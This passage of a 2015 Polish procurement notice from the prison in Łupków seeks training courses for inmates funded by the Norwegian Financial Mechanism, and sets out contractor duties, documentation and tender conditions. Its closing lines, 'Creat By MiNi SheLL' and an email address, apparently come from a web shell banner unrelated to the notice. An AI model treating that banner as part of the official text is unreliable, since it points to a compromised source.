c) wymagania wstępne dla uczestników kursu,d) cel kursu,e)plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar z uwzględnieniem części teoretycznej i części praktycznej,f) treści kursu w zakresie poszczególnych zajęć edukacyjnych,g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,h) sposób sprawdzania efektów kursu.5.Kursy zostaną zrealizowane od poniedziałku do soboty (z wyłączeniem dni ustawowo wolnych od pracy). Zadanie nr 1, 2 do 22 czerwca 2015r., Zadanie nr 3, 4 do 20 lipca 2015r. w terminach określonych przez Zamawiającego. Całość zamówienia zostanie zrealizowana  w terminie do 20 lipca 2015r.  6.Wykonawca zapewnia prowadzenie zajęć przez wykwalifikowaną kadrę, posiadającą odpowiednie wykształcenie kierunkowe.7.Po zakończeniu szkolenia wykonawca zobowiązany jest do wystawienia każdemu z uczestników zaświadczenia wg wzoru stanowiącego załącznik do Rozporządzenia Ministra Edukacji Narodowej 	z dnia 11 stycznia 2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r., poz. 622) opatrzonego właściwym dla Norweskiego Mechanizmu Finansowego 2009-	2014 logotypem oraz zapisem umożliwiającym identyfikację źródeł finansowania szkolenia, przygotowanego wg własnego projektu. Koszty wydania zaświadczeń pokrywa Wykonawca.8.Wykonawca zobowiązuje się do samodzielnego gromadzenia danych osobowych uczestników szkolenia i przetwarzania ich zgodnie z ustawą z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz.  U.  2014 r., poz. 1182, z późn. zm.)9.Wykonawca zobowiązany jest do umieszczania na dokumentacji szkoleniowej obowiązujących 	logotypów, właściwych dla Norweskiego Mechanizmu Finansowego 2009-2014 oraz zapisu umożliwiającego identyfikację źródeł finansowania.10.Wykonawca w trakcie trwania kursu zapewni warunki pracy zgodnie z przepisami bezpieczeństwa 	i higieny pracy i ppoż.11. Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu kursu stanowiącej:a) dziennik zajęć edukacyjnych zawierający imienną listę obecności podpisywaną przez uczestników kursu długopisem koloru niebieskiego lub zielonego, wymiar godzin i tematy zajęć,
b) listy obecności uczestników i wykładowców,c) ankiety oceniającej kurs,
 d) listy potwierdzające odbiór odzieży roboczej, środków ochrony osobistej i materiałów szkoleniowych,e) kserokopie zaświadczeń potwierdzających ukończenie kursu,f) rejestr wydanych zaświadczeń potwierdzających ukończenie kursu,g) dokumenty potwierdzające ubezpieczenie uczestników kursu i potwierdzenie dokonania opłaty z tego tytułu,h) protokół z przeprowadzonego egzaminu końcowego.12.Zamawiający zastrzega sobie prawo do sprawowania nadzoru nad przebiegiem i obsługą organizowanego kursu przez cały okres jego trwania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.50.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Zamawiający uzna, że warunek został spełniony w sytuacji, gdy Wykonawca złoży wraz z ofertą dokument wyżej określiny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbędzie się na podstawie złożonych oświadczeń i dokumentów przy zastosowaniu formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbędzie się na podstawie złożonych oświadczeń i dokumentów przy zastosowaniu formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbędzie się na podstawie złożonych oświadczeń i dokumentów przy zastosowaniu formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu odbędzie się na podstawie złożonych oświadczeń i dokumentów przy zastosowaniu formuły: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość  zmiany postanowień niniejszej umowy w następujących sytuacjach:1) gdy  nastąpi  zmiana  powszechnie  obowiązujących  przepisów  prawa  w  zakresie  mającym  wpływ  na  realizację przedmiotu umowy;2) konieczności  wprowadzenia  zmian  będących  następstwem  zmian  wprowadzonych w  umowach  pomiędzy Zamawiającym,  a  innymi  niż  wykonawca  stronami,  w  tym  instytucjami  nadzorującymi  realizację  projektu, w ramach którego realizowane jest przedmiotowe zamówienie;3)  konieczności  wprowadzenia  zmian  będących  następstwem  zmian  wytycznych  lub  zaleceń  dotyczących projektów współfinansowanych z Norweskiego Mechanizmu Finansowego 2009-2014;4)  zmian  wynikających  z  okoliczności,  których  nie  można  było  przewidzieć  w  dniu  zawarcia  umowy,  a  są  one korzystne dla Zamawiającego;5) zmian terminów rozpoczęcia i zakończenia  szkolenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Łupkowie, Łupków 45, 38-543 Komańcza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2015 godzina 12:00, miejsce: sekretariat Zakładu Karnego w Łupkowie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia odbędą się w ramach Programu Operacyjnego nr PL-17 pn. Wsparcie Służby Więziennej współfinansowanego ze środków Norweskiego Mechanizmu Finansowego 2009-2014  w ramach Projektu  nr 1 Realizacja szkoleń podnoszących kompetencje społeczno - zawodowe więźniów oraz stworzenie warunków ułatwiających podtrzymywanie więzi rodzinnych w celu zwiększenia efektywności ich powrotu do społeczeństwa po zakończeniu odbywania kary.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com